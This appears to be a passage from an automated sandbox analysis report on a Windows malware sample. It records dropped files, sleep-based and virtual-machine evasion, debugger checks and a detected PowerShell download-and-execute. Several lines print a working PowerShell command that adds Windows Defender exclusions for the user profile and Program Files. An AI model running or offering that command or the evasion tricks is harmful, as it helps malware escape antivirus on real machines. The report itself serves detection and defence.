            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\python3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\unicodedata.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\_decimal.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\_hashlib.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\_decimal.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\select.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\_socket.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\python312.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\_socket.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\_hashlib.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\unicodedata.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
            Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifAPI coverage: 3.9 %
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pif TID: 7708Thread sleep time: -54940s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe TID: 6012Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep time: -16602069666338586s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe TID: 7912Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5496Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4296Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep count: 6305 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep count: 3480 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5920Thread sleep count: 8254 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2588Thread sleep count: 1179 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4592Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2132Thread sleep count: 7958 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368Thread sleep time: -7378697629483816s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3004Thread sleep count: 1472 > 30
            Source: C:\Windows\System32\dialer.exe TID: 2324Thread sleep count: 123 > 30
            Source: C:\Windows\System32\dialer.exe TID: 744Thread sleep count: 125 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5124Thread sleep count: 6654 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep count: 2900 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep time: -10145709240540247s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\Update.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\Update.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\Update.exeLast function: Thread delayed
            Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
            Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
            Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
            Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifThread sleep count: Count: 5494 delay: -10Jump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0042E1AC GetFileAttributesW,FindFirstFileW,FindClose,19_2_0042E1AC
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0043A29A FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_0043A29A
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00436406 FindFirstFileW,FindNextFileW,FindClose,19_2_00436406
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003FC5F3 FindFirstFileExW,19_2_003FC5F3
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0043705D FindFirstFileW,FindClose,19_2_0043705D
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_004370FE FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_004370FE
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0042D65B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_0042D65B
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0042D98E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_0042D98E
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00439DB1 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00439DB1
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00439F0C SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00439F0C
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003C4E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,19_2_003C4E68
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\287175Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\287175\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: RegAsm.exe, 00000016.00000002.1905897871.000000000098A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}M
            Source: tmp11jjwww2.exe, 00000024.00000000.2628368119.00007FF64318D000.00000008.00000001.01000000.0000001D.sdmpBinary or memory string: ytUTqeMuES[Sw
            Source: powershell.exe, 00000019.00000002.2553688654.00000000075F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y<^
            Source: powershell.exe, 0000001F.00000002.2588953334.0000000007B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&Md
            Source: tmp11jjwww2.exe, 00000024.00000000.2628368119.00007FF64318D000.00000008.00000001.01000000.0000001D.sdmpBinary or memory string: ytU[qeMuES[Sw
            Source: powershell.exe, 00000019.00000002.2553688654.00000000075F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}J\
            Source: tmp11jjwww2.exe, 00000024.00000000.2628368119.00007FF64318D000.00000008.00000001.01000000.0000001D.sdmpBinary or memory string: vmCirsmnCNQ&{a
            Source: powershell.exe, 0000001F.00000002.2575583084.00000000035B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: powershell.exe, 0000001F.00000002.2588953334.0000000007B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
            Source: RegAsm.exe, 0000001D.00000002.2561867501.0000000000866000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\=g6Z
            Source: powershell.exe, 0000001F.00000002.2575583084.00000000035B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5U
            Source: RegAsm.exe, 0000001D.00000002.2561867501.0000000000866000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Ef
            Source: tmp11jjwww2.exe, 00000024.00000000.2628368119.00007FF64318D000.00000008.00000001.01000000.0000001D.sdmpBinary or memory string: vmCirsmnCNQ&{AXPGf{tlpWUSWvl{
            Source: powershell.exe, 00000019.00000002.2554339999.0000000007687000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0043F229 BlockInput,19_2_0043F229
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003F28E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_003F28E2
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003E5038 mov eax, dword ptr fs:[00000030h]19_2_003E5038
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00421244 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,19_2_00421244
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003F28E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_003F28E2
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003E0B8F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_003E0B8F
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003E0D25 SetUnhandledExceptionFilter,19_2_003E0D25
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003E0F71 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_003E0F71
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: amsi32_2504.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi32_7932.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2504, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7932, type: MEMORYSTR
            Adds a directory exclusion to Windows Defender
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            Allocates memory in foreign processes
